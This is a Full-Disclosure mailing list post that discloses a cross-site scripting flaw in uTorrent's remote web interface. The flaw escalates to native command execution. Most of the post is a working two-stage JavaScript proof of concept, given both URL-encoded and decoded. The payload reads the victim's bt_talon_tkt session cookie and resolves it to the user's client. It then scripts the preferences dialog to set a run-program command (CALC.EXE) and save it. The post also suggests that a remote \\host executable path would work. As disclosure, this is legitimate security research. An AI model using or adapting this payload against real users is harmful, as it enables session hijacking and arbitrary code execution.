Re: Transmission BitTorrent XSS Vulnerability

[Tavis Ormandy <taviso () cmpxchg8b com>]

Tavis Ormandy <taviso () cmpxchg8b com> wrote:

> Justin Klein Keane <justin () madirish net> wrote:
>
> > Impact - ------ Clients loading a maliciously crafted .torrent file into
> > Transmission and viewing the web client could be subject to arbitrary
> > script injection, allowing an attacker to run arbitrary code in the
> > context of the victim's web browser.  This could lead to privacy
> > compromises (such as if the script "phoned home" to another URL with
> > client information) or client side attacks (such as drive by downloads).
>
> I was just looking at a similar package for Windows called utorrent. They
> relay the remote administration through a third party, presumably to help
> non-technical users understand NAT traversal.
>
> Similar problems exist, but you can use it to set configuration options
> that result in command execution. I guess this problem is public as their
> contact address is a public bug tracking system (mea culpa).
>
> I have a working demo for command execution, email me off-list if you want
> it (I'm reluctant to send too much information about windows software to
> the list, as journalists tend to abuse it, email me if you need
> specifics).
>
> Tavis.

Too many requests, I've included details below. Don't get too excited, it's
not very interesting. I suppose it's worth documenting as another example of
XSS to native code execution, although it's more academic than a realistic
threat as nobody is likely to use this with an expectation of security.

The problem is that any XSS on remote.utorrent.com (or presumably if you're
a mitm with sslstrip) is equivalent to code execution if the "remote" option
has been enabled in the preferences dialog (Assuming the user is logged in,
of course).

As with any non-trivial web application, these are not difficult to find,
even for non-web specialists like me. Once you have an XSS, explotation is
relatively straightforward.

- Read the bt_talon_tkt cookie from remote.utorrent.com
- Resolve the ticket to a raptor using XHR to
'https://remote.utorrent.com/talon/getinfo?bt_talon_tkt=&apos; +
encodeURIComponent(ticket);
- Exploit the same XSS on the raptor, allowing you interact with the
  application.

The most obvious attack is to set the "state_cmd" option to whatever command
you require (I assume \\remotehost\whatever.exe will work via the webdav
redirector, but I didn't test it).

Here is the demo I sent to the vendor, I don't know if it works for all
cases

https://remote.utorrent.com/send?btih=DEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF&dn=ignored&message=';eval(unescape(document.location.hash.substring(1)));//#var%20ticket%3Bdocument.cookie.split%28%27%3B%27%29.forEach%28function%28cookie%29%
7Bticket%3Dcookie.indexOf%28%27bt_talon_tkt%27%29%21%3D-1%3FencodeURIComponent%28cookie.split%28unescape%28%27%2522%27%29%29%5B1%5D%29%3Aticket%7D%29%3Bx%3Dnew%20XMLHttpRequest%28%29%3Bx.open%28%27GET%27%2C%27/talon/getinfo%3Fbt_talon_tkt
%3D%27+ticket%2Cfalse%29%3Bx.send%28%29%3Braptor%3Deval%28%27%28%27%20+%20x.responseText%20+%20%27%29%27%29.raptor%3Bdocument.location%3Draptor.replace%28%27http%3A%27%2C%27https%3A%27%29.replace%28%279090%27%2C%279000%27%29+unescape%28%2
7/send%253Fbtih%253DDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF%2526dn%253Dignored%2526message%253D%2527%253Beval%2528unescape%2528document.location.hash.substring%25281%2529%2529%2529%253B//%2523f%25253Ddocument.createElement%252528%252527I
FRAME%252527%252529%25253Bf.src%25253D%252527/talon/gui%25253Futorrent%25253D1%252527%25253Bdocument.body.appendChild%252528f%252529%25253BsetTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.uki%252
528%252527%252523toolbar_preferences%252527%252529.trigger%252528%252527mousedown%252527%25252C%252520%25257Bwhich%252520%25253A%2525201%25257D%252529%252520%25257D%25252C%2525205000%252529%25253B%252520setTimeout%252528function%252520%25
2528%252529%252520%25257B%252520f.contentDocument.window.utWebUI.stpanes.show%252528%252527dlgSettings-RunProgram%252527%252529%252520%25257D%25252C%2525206000%252529%25253B%252520setTimeout%252528function%252520%252528%252529%252520%2525
7B%252520f.contentDocument.window.document.getElementById%252528%252527state_cmd%252527%252529.value%25253D%252527C%25253A%25255C%25255CWINDOWS%25255C%25255CSYSTEM32%25255C%25255CCALC.EXE%252527%252520%25257D%25252C%2525207000%252529%2525
3B%252520setTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.document.getElementById%252528%252527DLG_SETTINGS_SAVE%252527%252529.click%252528%252529%25253B%252520%25257D%25252C%2525208000%252529%25
253B%27%29%3B

Wait a few seconds, then check the preferences pane of the client to see if
the new setting has set.

The escaped text is the following inelegant code:

Stage 1 payload:

    var ticket;
    document.cookie.split(';').forEach(function (cookie) {
        ticket = cookie.indexOf('bt_talon_tkt') != -1
            ? encodeURIComponent(cookie.split(unescape('%22'))[1])
            : ticket
    });
    x = new XMLHttpRequest();
    x.open('GET', '/talon/getinfo?bt_talon_tkt=' + ticket, false);
    x.send();
    raptor = eval('(' + x.responseText + ')').raptor;
    document.location = raptor.replace('http:','https:')
                              .replace('9090','9000')
                              +
unescape('/send%3Fbtih%3DDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF%26dn%3Dignored%26message%3D%27%3Beval%28unescape%28document.location.hash.substring%281%29%29%29%3B//%23f%253Ddocument.createElement%2528%25
27IFRAME%2527%2529%253Bf.src%253D%2527/talon/gui%253Futorrent%253D1%2527%253Bdocument.body.appendChild%2528f%2529%253BsetTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.uki%2528%2527%2523toolbar_preferences%2527
%2529.trigger%2528%2527mousedown%2527%252C%2520%257Bwhich%2520%253A%25201%257D%2529%2520%257D%252C%25205000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.utWebUI.stpanes.show%2528%2527dlgSetti
ngs-RunProgram%2527%2529%2520%257D%252C%25206000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527state_cmd%2527%2529.value%253D%2527C%253A%255C%255CWINDOWS%255C%
255CSYSTEM32%255C%255CCALC.EXE%2527%2520%257D%252C%25207000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527DLG_SETTINGS_SAVE%2527%2529.click%2528%2529%253B%2520
%257D%252C%25208000%2529%253B');

Stage 2 payload:

    f = document.createElement('IFRAME');
    f.src = '/talon/gui?utorrent=1';
    document.body.appendChild(f);
    setTimeout(function () {
f.contentDocument.window.uki('#toolbar_preferences').trigger('mousedown',
{which : 1}) }, 5000);
    setTimeout(function () {
f.contentDocument.window.utWebUI.stpanes.show('dlgSettings-RunProgram') },
6000);
    setTimeout(function () {
f.contentDocument.window.document.getElementById('state_cmd').value='C:\\WINDOWS\\SYSTEM32\\CALC.EXE'
}, 7000);
    setTimeout(function () {
f.contentDocument.window.document.getElementById('DLG_SETTINGS_SAVE').click();
}, 8000);


I'm sure javascript programmers will cringe at my code, my apologies.

Tavis.

-- 
-------------------------------------
taviso () cmpxchg8b com | pgp encrypted mail preferred
-------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/